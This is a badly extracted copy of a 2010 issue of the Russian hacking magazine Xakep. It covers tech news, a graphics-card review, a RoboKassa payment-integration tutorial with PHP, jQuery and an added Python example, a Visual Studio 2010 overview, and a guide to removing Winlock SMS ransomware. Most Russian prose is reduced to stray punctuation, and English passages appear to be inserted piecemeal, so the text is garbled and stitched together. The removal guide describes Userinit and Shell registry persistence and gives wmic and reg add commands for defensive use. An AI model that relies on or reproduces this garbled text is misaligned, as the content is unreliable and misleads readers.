Xakep #04 (135), April 2010
http://group.xakep.ru

Cover stories:
Shareware for Symbian, p. 102
Hardware DEP, p. 68
.NET Remoting: grid computing, p. 96
CAPTCHA, p. 44
ActiveX, p. 58
Linux, p. 90

INTRO
http://group.xakep.ru

nikitozz

CONTENT
004 MegaNews
016 Ferrum
020 PC_ZONE: taking payments on your site (RoboKassa)
025 ACM ICPC
026 Visual Studio 2010
030 Trojan.Winlock: getting rid of SMS ransomware blockers
034 Easy-Hack
038 Vulnerability digest: gnome-screensaver, phpThumb, Danneo CMS, WordPress, Bugzilla
044 CAPTCHA
068 DEP and hardware-DEP
090 Linux
102 Shareware for Symbian
128 VPN

Also in this issue (page numbers not recoverable from the extracted table of contents): Unserialize; IN DA FOCUS; X-Tools; ActiveX; Error-based SQL-Injection; C#; GNU Screen and tmux; .NET Remoting: grid computing on the .NET Framework; CFEngine 2; SYN/ACK; PSYCHO; FAQ UNITED; WWW2.

EDITORIAL
nikitozz (nikitoz@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
Forb (forb@real.xakep.ru)
PC_ZONE, UNITS: step (step@real.xakep.ru)
UNIXOID, SYN\ACK, PSYCHO: Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
(bergman@gameland.ru)
xakep.ru: (xa@real.xakep.ru)

ART
(novikov.e@gameland.ru)
(svetlyh@gameland.ru)

DVD
Step (step@real.xakep.ru)
Unix section: Ant

PUBLISHING
119021, Moscow, 11, 44-45
tel.: +7 (495) 935-7034, fax: +7 (495) 780-8824
PR, advertising and distribution: tel. (495) 935-7034, fax (495) 780-8824
GAMES & DIGITAL: (goryacheva@gameland.ru)
Gameland TV
(strekneva@gameland.ru), (ashomko@gameland.ru), (korenfeld@gameland.ru), (andrey@gameland.ru), (devald@gameland.ru), (kosheleva@gameland.ru), (goncharova@gameland.ru)
tel.: (495) 935.70.34, fax: (495) 780.88.24
Toll-free: 8 (800) 200.3.999
Postal address: 101000, Moscow, PO box 652
Registration certificate 77-11802 of 14 2002
Lietuvas Rivas. Circulation: 100 000.
Letters to the editors: content@gameland.ru
Gameland, 2009

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU


- ,

, ,
. Cleankeys Touch Sensitive
Cleankeys Inc. , ,
, ,
. Cleankeys Touch Sensitive
, ,
!
, , ,
. , , ,
, $450
$400 , - .
,
. ,
. ,

.

GOOGLE WIKIMEDIA
FOUNDATION.





, -
,
. :

Virus Total (www.virustotal.
com) 20 10
. ,
.
, ,

, Virus Total.
,
10
10
14
,
. Virus Total
Hispasec Sistemas,
,

, ,
. ,
Virus Total ,

. ,
, , ,

,
.


NOKIA.
?

AMAZON KINDLE


3
.

Maemo,

, Nokia
. , , Nokia
Intel ,
MeeGo,
, ,
.
,
: Moblin (Mobile Linux) Maemo,

. , MeeGo

Symbian,

, , ,
Nokia N900.
Linux
kernel.org ,
, .

Qt,

Nokia. , MeeGo
.

THE PIRATE BAY



, ,

torrents.ru!
, ,
, rutracker.
org, , .
, :
torrents.ru -
.
26

AutoCAD Autodesk.
,
1,5 .
torrents.ru
, ,
( , )
-
,

.
,
Autodesk, 1, ,
,
,

. ,
torrents.ru
,
, ,
.

-
EKinoT.ru, IT eBay,
Twitter, Cisco Systems, Howcast, Edventure,
Social Gaming Network Mozilla,
.
, , Twitter
, , Catalys.
? ? ,
Dreamtorrent ( torrents.ru) -,
,

,
-.

,
,
.
: .ru . torrents.ru :

Cherokee (www.cherokee-project.
com) -, ,
,
HTTP-.
.

TWITTER : 1

, 17%.

16- , 10

. , ?
Cyber ShockWave Bipartisan
Policy Center.
, CNN.
: -
,
, , -


,
. , , .
,
, ,
. .
, :
:).

STRATEGY ANALYTICS , 2016


90% .

,
, , ? ,
! : ? ,
!
Digital Access. 26 Digital Access ivi.
ru, 9.000
, , - , . .
?, , , ,
. , vs . ivi.ru :
uravo.tv, 30- .
Rambler , ,
. , , Digital Access
, 2011
20% .,
.

:

44- .

, ,
, eBay
, , 16 . ,
, . , ,
,
, . ,
eBay ,
- PayPal, , ,
, .
, . ,
- (, - )
, , : .
, :
, , ! eBay, ,
,
. .




,

24 .

The Pirate Bay , Flattr . ,


, , ,
,
, , . :
Flattr , , $10. , , , - Flattr-.
, Flattr-,
. , . ,
, ,
, . , Flattr-, , ,
. , 10 ,
$1, 100 $0,1. , .
.

NVIDIA OPTIMUS
NVIDIA: ,
. NVIDIA Optimus ,
. NVIDIA
, . , NVIDIA
Optimus , , ,
ASUS UL50Vf, N61Jv, N71Jv, N82Jv U30Jc.


USB 3.0
USB 3.0 SATA 6 /
,
,
, . ,
,

?
GA-USB3.0 Gigabite.
PCI-Express x1
USB 3.0. GA-USB3.0
Molex,
.
$40.


RADEON HD 5830
AMD 3D
ATI Radeon HD 5830,
,

Gigabyte, Sapphire,
XFX . ,
AMD . ATI Radeon HD
5830

5770 5850. ATI Radeon HD
5800 $240.
:
40- Cypress
1120 ,
56 1 GDDR5.
800 4000
. ATI Radeon HD 5830
DirectX 11, ATI Eyefinity, CrossFireX ATI Stream.
,
,
Radeon HD 5830 .

,

- ,
Globalscale GuruPlug Server. . 99
,
ARM: Marvell KirkWoord 1.2 , 512 DDR2 800 ,
802.11g, Bluetooth-,
Ethernet, 2 USB2.0, .
ARM- Debian
2.6.32, , , . Ethernet eSATA,
PLUS 30 . www.
globalscaletechnologies.com , ,
shipito.com,
. , ,
: 5
175 .

Black Hawk Safety Net


(3800hk.com), . ,
, , , 12000
. 12000 VIP-
650000 .
, , . , ,
.

WIMAX FORUM,
WIMAX
620 .
, 2011
1 .

PWN2OWN 2010



500000 !
:
3- .


Google
Chrome $1337,
Pwn2Own, security- CanSecWest , .

4- ,

$100000. $40000,

(Microsoft Internet Explorer,
Mozilla Firefox, Google Chrome,
Apple Safari),
(XP Vista, Windows
7, Mac OS X Snow Leopard).

-

.
Apple iPhone
3GS, RIM Blackberry Bold 9700,
Nokia Symbian
S60 (, E62),
Motorola
Google Android.

.
,

Safari, Firefox
Internet Explorer 8,

(
Nils ),

. ?


, ,

pleaserobme.com ( ,
)
.
,

,
.
:
-


Twitter. ,
,
.
,




.

SCANSAFE , 2009
80%

PDF-.

GSM ,
4G
19 1710-1785 1805-1885
GSM .
, ,
. , , .
, .
, Delta, Air France, Lufthansa, Emirates .
15
LTE (Long Term
Evolution) . CDMA/UMTS
326,4 / , 172,8 / .
: WiMax vs. LTE,
, .
LTE 2009 .



-,
, .
: -, ,
,
. Symantec , ,
. Live PC Care
! , , ,
.
,
,
( $30100).
.


Y2K , 10
- PlayStation 3
,
. Y2k,
?
, PS3. -
28 1
2010 PlayStation 3
( Slim- ), , (
) PlayStation
Network. PSN
: An error
has occurred. You have been signed out of PlayStation
Network (8001050F)
, Failed to install
trophies. Please exit your game.
1 2000 (

). Sony 2010 ,
. ,
29 1 .
, 24
, . ,


Zeus
. SpyEye
2009,
. Zeus,

.

-,
(C&C) .
, (1.0.7) Kill Zeus. SpyEye
Windows API
HttpSendRequestA,
Zeus . ,
SpyEye,
Zeus,
, Zeus C&C-
(,
) , , .
Zeus.



.
.

, .

, , ? ,
.
, .
NVIDIA ATI,
, , low-end .
. ATI ,
NVIDIA CUDA PhysX, ,
. , ATI Stream,
CUDA. , , ATI ( ,
).
. NVIDIA 512 ,
ATI 256- . ,
GDDR5,
.
. NVIDIA 55 -, ATI 40 . , NVIDIA
40 .


, , . ,
. ,
, . 3DMark 2003,
Red Faction: Guerrilla, Resident Evil 5 Batman: Arkham Asylum.
, ,
16801050 , ,


:
PALIT GEFORCE GT 220
PALIT GEFORCE GT 220 SONIC
PALIT GEFORCE GT 240 SONIC
SAPPHIRE RADEON HD 4650
SAPPHIRE RADEON HD 4670 ULTIMATE
SAPPHIRE RADEON HD 5750
. Red Faction: Guerrilla 12801024 , .
,
,
, .

[Chart: Batman: Arkham Asylum, FPS, for Palit GeForce GT 240 Sonic, Palit GeForce GT 220 Sonic, Palit GeForce GT 220, Sapphire Radeon HD 5750, Sapphire Radeon HD 4670 and Sapphire Radeon HD 4650; scale 0-80]
[Chart: GPU comparison for the same six cards; scale 0-100]
PALIT GEFORCE GT 220
Price: 1800 rub.
Specifications: Process: 40 nm; Core clock: 635 MHz; Memory clock: 800 MHz; Memory type: DDR2; Memory size: 512 MB; Bus width: 128-bit; Interface: PCI Express 2.0; DirectX: 10.1

NVIDIA GeForce GT 220. ,


,
, , PCI-E. ,
DVI HDMI VGA, ,
, , .
Palit 10 . , , .

, 51 ..

DDR2 , ,
,
. .
, .
PALIT GEFORCE GT 220 SONIC
Price: 2000 rub.
Specifications: Process: 40 nm; Core clock: 650 MHz; Memory clock: 900 MHz; Memory type: GDDR3; Memory size: 512 MB; Bus width: 128-bit; Interface: PCI Express 2.0; DirectX: 10.1

Sonic .
,
Palit GeForce GT 220. -,
GDDR3,
, .
-, 10 650 900
, ( , 625
790 ). ,
, Palit
. , , 128- 1 -,
. VGA, HDMI DVI. ,
.

.
,
.

[Chart: Resident Evil 5, FPS, for the same six cards; scale 0-80]
[Chart: Batman: Arkham Asylum, Resident Evil 5 and Red Faction: Guerrilla, FPS per rouble; scale 0-25]

PALIT GEFORCE GT 240 SONIC
Price: 3500 rub.
Specifications: Process: 40 nm; Core clock: 585 MHz; Memory clock: 945 MHz; Memory type: GDDR5; Memory size: 1024 MB; Bus width: 128-bit; Interface: PCI Express 2.0; DirectX: 10.1

NVIDIA
. , GDDR5,

. Sonic ( 95 ) ( 35 ), . ,
ATI Radeon Sapphire Radeon HD 5750.
,
,
.

, ,
, ,
- .

SAPPHIRE RADEON HD 4650
Price: 1700 rub.
Specifications: Process: 55 nm; Core clock: 600 MHz; Memory clock: 700 MHz; Memory type: GDDR3; Memory size: 512 MB; Bus width: 128-bit; Interface: PCI Express 2.0; DirectX: 10.1

, ,
, , .
low-end,
. , , ,
Sapphire Radeon HD 4650 . HDMI, VGA
DVI, . .

, . , ,
Red Faction: Guerrilla.

. , ,
, , .
[Chart: Red Faction: Guerrilla, FPS, for the same six cards; scale 0-30]
[Chart: 3DMark 2003 score for the same six cards; scale 10000-50000]

.
,
Sapphire Radeon HD 5750
.

SAPPHIRE RADEON HD 4670 ULTIMATE
Price: 3100 rub.
Specifications: Process: 55 nm; Core clock: 750 MHz; Memory clock: 873 MHz; Memory type: GDDR3; Memory size: 512 MB; Bus width: 128-bit; Interface: PCI Express 2.0; DirectX: 10.1

SAPPHIRE RADEON HD 5750
Price: 5700 rub.
Specifications: Process: 40 nm; Core clock: 700 MHz; Memory clock: 1150 MHz; Memory type: GDDR5; Memory size: 1024 MB; Bus width: 128-bit; Interface: PCI Express 2.0; DirectX: 11

,
. - , , Sapphire
Radeon HD 4670 Ultimate, ,
.
, ,
. .
, ,
.

.
, ,
,
DirectX 11. , ,
,
, . ,
, . ,
.

, ( ). , -
, ,
.

, , ,
. ,
.

, ,
-


. , ,
.
Sapphire Radeon
HD 5750,

, .
Palit GeForce GT 220 Sonic
..z


PC_ZONE
gurza brain@bidiko.ru



! , !
, . -,
? ?
? .

,

Webmoney. , ,
: ,
. ,
. , ,
,
.
,

.
, ,
. , , ,
, . :

,
.
,
? , .

( PDF- ),
, SMS.
Robokassa'
(www.robokassa.ru), -


. ,

,
- ,
, ,
- ,
.

,

.
(.,
Webmoney )? !
SMS? .

.
,
? , 9 . .

,
5% .
, .

,
! , , , PHP (+ curl)
jQuery,


ROBOKASSA

We will use the RoboKassa aggregator as the example. The integration below is in PHP, but RoboKassa has no client library to depend on: everything is plain HTTP GET/POST requests to https://merchant.roboxchange.com, so Perl, ASP or Python work just as well. The flow has three steps:
1. Your site redirects the buyer to a RoboKassa URL whose parameters describe the order (amount, invoice number, description) and carry a signature.
2. RoboKassa shows the payment page for the chosen payment method and the buyer pays (a working demo of the whole thing: bidiko.ru/test/xa/payments.php?item=1).
3. RoboKassa notifies your site by requesting the Result URL; after that the buyer is sent to the Success URL (the payment went through) or the Fail URL (it did not). The Result, Success and Fail URLs are configured in the RoboKassa merchant panel.
Step by step:
1. Build the redirect URL:

// invoice number; 0 lets RoboKassa assign one
$inv_id = 0;
// our own parameters, passed through to the Result URL
$shp_item = $item;
$shp_user = 'TestUser';
// signature
$crc = md5("$mrh_login:$out_summ:$inv_id:$mrh_pass1:Shp_item=$shp_item:Shp_user=$shp_user");
// the payment URL
$url = "https://merchant.roboxchange.com/Index.aspx?MrchLogin=$mrh_login&OutSum=$out_summ&InvId=$inv_id&Desc=$inv_desc&Shp_item=$shp_item&Shp_user=$shp_user&SignatureValue=$crc";

The parameters travel in the query string (GET):
MrchLogin is the merchant login from your RoboKassa account; demo is the test login.
OutSum is the amount to charge.
InvId is the invoice number. 0 means "let RoboKassa assign one", but with your own unique number per payment you can match the Result notification to the order.
Desc is the description shown to the buyer; URL-encode it.
Shp_item and Shp_user are custom parameters: anything prefixed with Shp_ is handed back to the Result URL untouched (here the item id and the user name) and takes part in the signature.
InvId together with the Shp_ parameters is how the Result handler later knows which order has been paid.
SignatureValue protects all of the above: the md5 of "$mrh_login:$out_summ:$inv_id:$mrh_pass1:Shp_item=$shp_item:Shp_user=$shp_user", where $mrh_pass1 is password #1 set in the merchant panel. The password itself never leaves your server; RoboKassa recomputes the hash on its side, so a buyer cannot change the amount in the URL without breaking the signature.

2. Redirect the buyer to $url. RoboKassa takes it from there: the buyer picks a payment method and pays.

3. Write the Result URL handler. It has two jobs: make sure the request really came from RoboKassa, and record the payment (the amount, the invoice number and our Shp_ parameters arrive with it). RoboKassa expects the plain-text reply "bad sign" on a signature mismatch and "OK<InvId>" on success:

// parameters sent by RoboKassa
$out_summ = $_REQUEST["OutSum"];
$inv_id = $_REQUEST["InvId"];
$shp_item = $_REQUEST["Shp_item"];
$shp_user = $_REQUEST["Shp_user"];
$crc = strtoupper($_REQUEST["SignatureValue"]);
// our copy of the signature, this time with password #2
$my_crc = strtoupper(md5("$out_summ:$inv_id:$mrh_pass2:Shp_item=$shp_item:Shp_user=$shp_user"));
if ($my_crc != $crc) { die("bad sign"); }
// ... record the payment for $inv_id here ...
echo "OK$inv_id";

The Result signature uses password #2, which is independent of password #1. Check the amount against the order as well: the signature proves who sent the notification, not that $out_summ equals what you expected for that invoice.
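As an added example (not from the article and not RoboKassa's code), here is the same signing and Result-URL verification in Python. The merchant login demo is the article's; the two passwords, the invoice store and the amounts are placeholders. It adds the two checks the PHP above leaves to the reader: a constant-time signature comparison and a comparison of OutSum against the invoice we issued, plus a replay check.

```python
import hashlib
import hmac
from urllib.parse import urlencode

PAYMENT_ENDPOINT = "https://merchant.roboxchange.com/Index.aspx"

# "demo" is the login used in the article; the passwords are placeholders
# (assumption) standing in for password #1 and #2 from the merchant panel.
MERCHANT_LOGIN = "demo"
PASS1 = "example-password-1"
PASS2 = "example-password-2"


def _shp_tail(shp):
    # Custom Shp_* parameters go into the signed string as "Shp_k=v", sorted by
    # name, which for the article's Shp_item/Shp_user is the order it uses.
    return ":".join(f"{k}={v}" for k, v in sorted(shp.items()))


def payment_signature(login, out_sum, inv_id, pass1, shp):
    """SignatureValue for the redirect: md5("login:sum:invid:pass1:Shp_...")."""
    base = f"{login}:{out_sum}:{inv_id}:{pass1}:{_shp_tail(shp)}"
    return hashlib.md5(base.encode()).hexdigest()


def payment_url(out_sum, inv_id, desc, shp):
    """Build the URL the shop redirects the buyer to (step 1 of the flow)."""
    params = {"MrchLogin": MERCHANT_LOGIN, "OutSum": out_sum, "InvId": inv_id, "Desc": desc}
    params.update(shp)
    params["SignatureValue"] = payment_signature(MERCHANT_LOGIN, out_sum, inv_id, PASS1, shp)
    return f"{PAYMENT_ENDPOINT}?{urlencode(params)}"


def result_signature(out_sum, inv_id, pass2, shp):
    """Signature RoboKassa sends to the Result URL: md5("sum:invid:pass2:Shp_...")."""
    base = f"{out_sum}:{inv_id}:{pass2}:{_shp_tail(shp)}"
    return hashlib.md5(base.encode()).hexdigest()


def handle_result(params, pass2, invoices):
    """Result-URL handler. `invoices` maps InvId -> {"amount": str, "paid": bool}
    and stands in for the shop's database. Returns the body to send back."""
    shp = {k: v for k, v in params.items() if k.startswith("Shp_")}
    expected = result_signature(params.get("OutSum", ""), params.get("InvId", ""), pass2, shp)
    presented = params.get("SignatureValue", "")
    # Constant-time comparison; the hex may arrive in either case.
    if not hmac.compare_digest(expected.lower(), presented.lower()):
        return "bad sign"
    # The signature only proves RoboKassa sent it. The amount must still match the
    # invoice we issued, and an invoice must not be marked paid twice (replay).
    inv = invoices.get(params["InvId"])
    if inv is None or inv["amount"] != params["OutSum"] or inv["paid"]:
        return "bad sign"
    inv["paid"] = True
    return f"OK{params['InvId']}"
```

handle_result() is what the Result URL script calls with the decoded request parameters; the reply string goes straight back to RoboKassa.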

,
API- RoboKassa, -



.
.

, .
1. , (
, ,
..). ,
.
,

.
2.

.
,
,
.

.
,
,
ajax-,
( ,
) ,
.
curl:
,
.


payments.php.
$item
/ (
),
GET. payments.php
, ( )

022

. payments.php.
<?php
// read the item id from the request
// look the item (price, description) up
// build $url as shown above
?>
<div id="xmlConsole">
<!-- status of the XML request: loading indicator or error -->
</div>
<div id="pay_systems">
<!-- payment methods with the amount in each currency -->
<table class="pay_table">
<!-- rows are filled in by the XML handler -->
</table>
</div>

payments.php (

)
,
switch.
,
,
, .
,
,
.

.
: ,
(,
),

.


, .

,
. Result-

"bad sign", ,
/ , , .
2
RoboKassa,

RoboKassa, ,
.
, ,
RoboKassa,
email. ,
-
! RoboKassa,
URL
.

pay_table.

Each row of pay_table shows one payment method and the amount in its currency:
<b id="PayCode"></b>
where PayCode is the RoboKassa currency label (for example PCR) used as the element id; the XML handler below fills the amount in by that id. The link for a method appends the same label to $url as IncCurrLabel, so RoboKassa opens straight on the right payment page:
<a href="<?php echo $url.'&IncCurrLabel=PCR'; ?>">...</a>


,
.

XML-
ROBOKASSA JQUERY


,

.
XML- RoboKassa.

XML- POST www.
roboxchange.com/xml/rate.asp.
:
X 04 /135/ 10

Request to RoboKassa:
<robox.rate.req>
<out_curr>OUTCURR</out_curr>
<merchant_login>LOGIN</merchant_login>
<out_cnt>CNT</out_cnt>
</robox.rate.req>

OUTCURR is the currency we want to receive (the label RoboKassa uses for it), LOGIN the merchant login and CNT the amount.
The XML RoboKassa returns:
<robox.rate.resp>
<retval>nRetCode</retval>
<out_curr>sOutCurrLabel</out_curr>
<out_cnt>nOutCount</out_cnt>
<date>sDateODBC120</date>
<ratelist>
<rate>
<in_curr>sIncCurrLabel</in_curr>
<in_curr_name>sIncCurrName</in_curr_name>
<value>nValue</value>
<ins_per_Xout>nInCount</ins_per_Xout>
</rate>
...
</ratelist>
</robox.rate.resp>

Where: nRetCode is the result code, 0 on success (the other codes are listed in the RoboKassa documentation, www.robokassa.ru/Doc/Ru/Interface.aspx); sOutCurrLabel is the requested currency; nOutCount the requested amount; sDateODBC120 the timestamp ("yyyy-mm-dd hh:mm:ss", GMT); and there is one <rate> element per payment method RoboKassa accepts.
Inside <rate>: in_curr is the method's label, the same value we used as the PayCode id in payments.php; ins_per_Xout is how much of that currency the buyer has to pay for us to receive the requested amount, which is exactly the figure to show in the table.
To fetch this XML from the page we use jQuery (the code lives in rk_xml_int.js), starting with ajax():
ajax().
function getXML(url, cnt){
$.ajax({
url: url,
type: 'POST',
dataType: 'xml',
data: {cnt: cnt},
beforeSend: xmlStart,
success: xmlSuccess,
error: xmlError,
complete: xmlComplete
});
}

getXML() .
url
URL-,
. cnt
. ,
ajax(),
, xmlStart, xmlSuccess, xmlError,
xmlComplete, . . ,
url ,
.

A PHP PROXY FOR XMLHTTPREQUEST

Under the hood jQuery's ajax() uses the browser's XMLHttpRequest object, which sends HTTP requests from the page's JavaScript. Browsers restrict it to the page's own origin (the same-origin policy, there so that an XSS on one site does not become a way to read another): a script.js loaded from serv1.com cannot fetch a document from serv2.com with XMLHttpRequest. So the request to RoboKassa has to be relayed by our own server, which is what rk_rate_proxy.php is for: rk_xml_int.js sends the XMLHttpRequest to rk_rate_proxy.php on our host, the script builds the XML request, sends it to RoboKassa with curl and returns the response. The curl part:
XML- curl
:
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: close'));

$url is the address of the RoboKassa XML interface (www.roboxchange.com/xml/rate.asp), $request the XML document built from the amount the page passed to rk_rate_proxy.php. The amount is cast to an integer before it goes into the XML, so nothing else from the request can end up in the document:

$cnt = (int) $_POST['cnt'];
$request  = '<robox.rate.req>';
$request .= '<out_curr>RUR</out_curr>';
$request .= '<merchant_login>demo</merchant_login>';
$request .= '<out_cnt>'.$cnt.'</out_cnt>';
$request .= '</robox.rate.req>';

RUR is the currency we want to receive and demo the test merchant login.


demo.
curl ,
. ,

023

PC_ZONE

xmlError() runs when the XML request fails: it replaces the contents of the "console" div with an error message and hides the payment-method table.
function xmlError(xhrInstance, message, optional) {
    $("#xmlConsole").html('<h2><font color="red">Error!</font></h2>');
    $("#pay_systems").css('display', 'none');
}

When the XML request completes, xmlComplete() removes the ajaxLoaderCSS class from the div with id=xmlConsole, and on success xmlSuccess() hands the document to parseXML(), which walks the XML with jQuery (shown below).

The proxy itself finishes by sending RoboKassa's answer to the browser as XML:
$result = curl_exec($ch);
header('Content-type: text/xml');
echo $result;

, PHP- rk_rate_proxy.php .
.

Back to the page. Each callback passed to ajax() handles one stage of the request. xmlStart() runs before the XML request is sent and adds the ajaxLoaderCSS class to the div with id=xmlConsole; the class shows an animated "loading" image (www.ajaxload.info generates them):
function xmlStart(xhrInstance) {
    $("#xmlConsole").addClass("ajaxLoaderCSS");
}


function parseXML(xml){
    // walk every <rate> element
    $(xml).find('rate').each(function(){
        // payment method label
        var curr = $(this).find('in_curr').text();
        // amount in that method's currency
        var val = $(this).find('ins_per_Xout').text();
        // write it into the table cell whose id is the label
        $('#' + curr).html(val);
    });
}

Finally, payments.php starts the whole thing once the DOM is ready, passing the amount to getXML():
<script type="text/javascript">
$(function() {
<?php
    $tmp_out_summ = (int) $out_summ;
    echo "getXML('rk_rate_proxy.php', $tmp_out_summ);";
?>
});
</script>

getXML() ,
, DOM-
.

.

, . ? !
. , , ,
.
. . z

S TEP T W I T T E R . C O M / S T E PA H


ACM ICPC: c , ,,

ACM-ICPC,
IBM, . ,
, : ,
. IBM :
, , . ?!
- ,
. ,

, .
, 30
. ACMICPC
.
: -
,
, .
(, ,
)
. ,
- IBM
, . -
: !
, , .
103
.
( , ), - .
20 .
, ,
ACM ICPC ,
.
,
, ,
. 11
. 18
. , ,

. ?
: . !
. , , ,
5 , 11
.
,


ACM ICPC
, .
, , ,
,
IBM Smarter Planet ( )
, ,
,
,
,

. ,

,
,

.
. , , ,
,
.

C, C++ Java
.
,

,
.
,
. ,
,
,
, .
? , .
30
,
.
,
.
. , -
: , ?
? ,

three, two, one . ,
. ,
.
: ACM-ICPC
, .
: , ()
- ().
. , ,
. z


PC_ZONE
i-vizaik@microsoft.com


?
Visual Studio 2010

VISUAL STUDIO 97 . MICROSOFT ,


. VISUAL STUDIO 2010.
MICROSOFT ,
.

,
,
, Visual Studio
2010
12 2010.
:).

2009 . ,
,

. , ,

.
?
! ,

.
,
.

UI

(IDE Integrated
Development Environment) ,
, . :


Windows Presentation Foundation (WPF).


,

. ,
,
, .

.
,
VS
, IDE
:). ,
, MS
.

,

.

,
,
.
,
WPF,

.
,
,

,
.

.
Visual Studio 2010 :
.
:
,
.
,

.

, ,
Visual Studio
, 2010

. ,
Call Hierarchy ( )
(" ?", "
") ,
.
Find All References.
,

IDE


Visual Studio 2010

Call Hierarchy
, .
,
,
,
.

. Visual Studio 2010

, ,
.
, Navigate
To ( ,
CTRL+)
level-up
,
. ,

.
, ,
,
.
,
.
, .
. :

, (private). ,


, , , . , SHIFT+ALT ( )
,
, ,
.
.


, ,
\\.
-
( code snippets) HTML
JavaScript.

,
, . Visual Studio 2010
.

.


. Watch:

,
.
,
,

,
. .
, , ,
.
,
.
IntelliTrace,
.

:
.
: , , , : ,
,
, !

:
,
, . , ,
,
,
,
, ,
, .
,

.

? :
. ,


.NET Framework 4,
Visual Studio 2010,
,

.
.


.NET FRAMEWORK 4


(deadlock).
:
, (),
.


Visual Studio 2010 : (Parallel Stacks)
(Parallel Tasks).
,
. ,
,
, :
.

: ,
.
,
,

.
, , ,


, ,
.
,

Visual Studio
2010 .
,

:
(Concurrency
Profiling),

,
.
, , .
Tier Interaction Profiler.

,
. -,

, . ,
ASP.NET -

Visual
Studio 2010 .NET
Framework 4,
. , ,
:


.
: BigInteger
Complex.
. ,

,
.
.NET Framework
Managed Extensibility Framework (MEF)

().

, .
,
MEF.
Visual Studio 2010.
, .NET Framework
4
.
System.Threading.
, WPF
:
DataGrid, Calendar DataPicker, ,
.

JavaScript Internet
Explorer 8.
,
,
, ,

.

, ,

,

-. ,


,
.

RESHARPER?
INFO

Visual Studio
2010 JetBrains ReSharper (www.
jetbrains.com).
, , -.
, ReSharper, Visual Studio 2010, C# 4 VB10,
ASP.NET
ASP.NET MVC.
,
, LINQ
,
.
,
,
,
.

info


Microsoft


i-vizaik@
microsoft.com

IntelliTrace

,
.
:
,
.
C# VB ,
,
. -
Microsoft Excel,
Basic, .

Visual Studio 2010


.
? !
- ,
RC . ,

Visual Studio ,
.
.
,
IDE,
.z

Navigate To

EXPRESS- !

Visual Studio 2010


.
: Ultimate, Premium,
Professional Express. Visual Studio
2010, : .
, -
VS!

, -
, Express


PC_ZONE
Step twiter.com/stepah



!
xakep 31337.
SMS, ,
, , Microsoft , , , , . .

Trojan.Winlock ,
, ,
.

(
Ransomware ransom,
), ,
SMS . , :
,
Microsoft
,
, ,
,

SMS.


(, , ,


),
, ,
, , .
,
,
,
SMS .
-

. ,
,
, . , , ,
, .
, , , .
TDL3,
. ,
( , ,
). ,
,


( ).
,
, , ,
, , .
,

, ?
, .
- ,
.


, .
1. , ,
.
,

,
.

Dr.Web

Windows has a remote process tool built in: wmic (WMI Command-line). From another machine on the network, with an administrator account for the locked box, start it against that box:

wmic /NODE:<address> /USER:<user>
e.g. wmic /NODE:192.168.1.12 /USER:yastep

It asks for the password and gives you a prompt. Type process to list the running processes, find the blocker and kill it with delete:

process where name="<process name>" delete

After that the desktop is usable again and the clean-up can begin.


, , .
2. Windows XP/2000,
<WIN-U>
,

.
- ,
,
.
3. ,

,
.
LiveCD.
,
,
ERD Commander.
,

: 5.0 Windows XP, 6.0 Windows
Vista, 6.5 Windows 7/Server 2008 R2.



,
.
rescue-
LiveCD ,
: Dr.Web LiveCD
(www.freedrweb.com/livecd) Kaspersky
Rescue Disk (devbuilds.kaspersky-labs.com/
devbuilds/RescueDisk).
4. ,
,
. ,
, ,
,
, ,
, .
,

,
, , ,
.
,
. ,
,
,
, ,
SMS .

:
:
support.kaspersky.ru/viruses/deblocker;
Dr.Web:
http://www.drweb.com/unlocker/index;
Eset: www.esetnod32.ru/.support/winlock.

RansomHide (http://softget.
net/freeware/projects/RansomHide/ransomhide.
exe). SMS
,


. ,
- ,
.


, ,
. ,
(

,
, Hijackthis, Autoruns OSAM).
,
, .
A classic place is HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: the value lists the programs Winlogon starts right after logon. Normally it holds only Userinit.exe, which runs logon scripts, re-establishes network connections, starts Explorer.exe and so on. Winlock-type malware simply appends itself, so the value ends up looking like

Userinit = %systemfolder%\userinit.exe,[path to the malware]

and the malware starts before the shell. The appended file usually sits in a tmp directory or somewhere under the Windows directory. Remove the tail and leave only %systemfolder%\userinit.exe (with the trailing comma).
The neighbouring Shell value (explorer.exe by default) is the other popular spot: the malware replaces explorer.exe with its own file or appends itself to it.
The body can also hide in an NTFS alternate data stream. Sysinternals' streams (technet.microsoft.com/en-us/sysinternals/bb897440.aspx) lists and removes them: "streams.exe -d -s c:\". Note that -d deletes every stream it finds, Zone.Identifier markers included; run it with -s alone first to see what is there.


, -



Hijackthis
(
,
), ,
( ):
Kaspersky Virus Removal Tool (avptool.
virusinfo.info) , ,
. ,
.
,
.
Dr.Web CureIt! (www.freedrweb.com/cureit)
,
,
.
,
.
,
,
, ,

- :
AVZ (www.z-oleg.com/secur/avz) , ,
, .
-

AVZ



. AVZ
,
,
,
. ,

API-.
HijackThis (free.antivirus.com/hijackthis)
, AVZ, ,
, .
,

.

security-,
,
virusinfo.info.
, AVZ/HijackThis,

-, AVZ.

, AVZ
-> /
-

! virusinfo.info
!
virusinfo.info.
, , DLL-,
Internet Explorer , .
HTML,

,
,
.

LiveCD Dr.Web
80

ERD
Commander

,
,
, , ,
. ,
.

Policies are stored per user under HKEY_CURRENT_USER and machine-wide under HKEY_LOCAL_MACHINE, so look in both. The values that lock the registry editor out are DisableRegedit and DisableRegistryTools:


SMS-,

SMS ?
SMS .
, .
Google' sms , . ,
, , - , Google , .
, , .
, .
, : , , . .
, , , SMS , ,
( ),
. , , , , .
, . , . , : SMS
, SMS
.

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

.
If .exe files refuse to start, the handler for the exefile type has been changed. Import this .reg file to restore it (note the quoting: the default value must be "%1" %*):
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell]
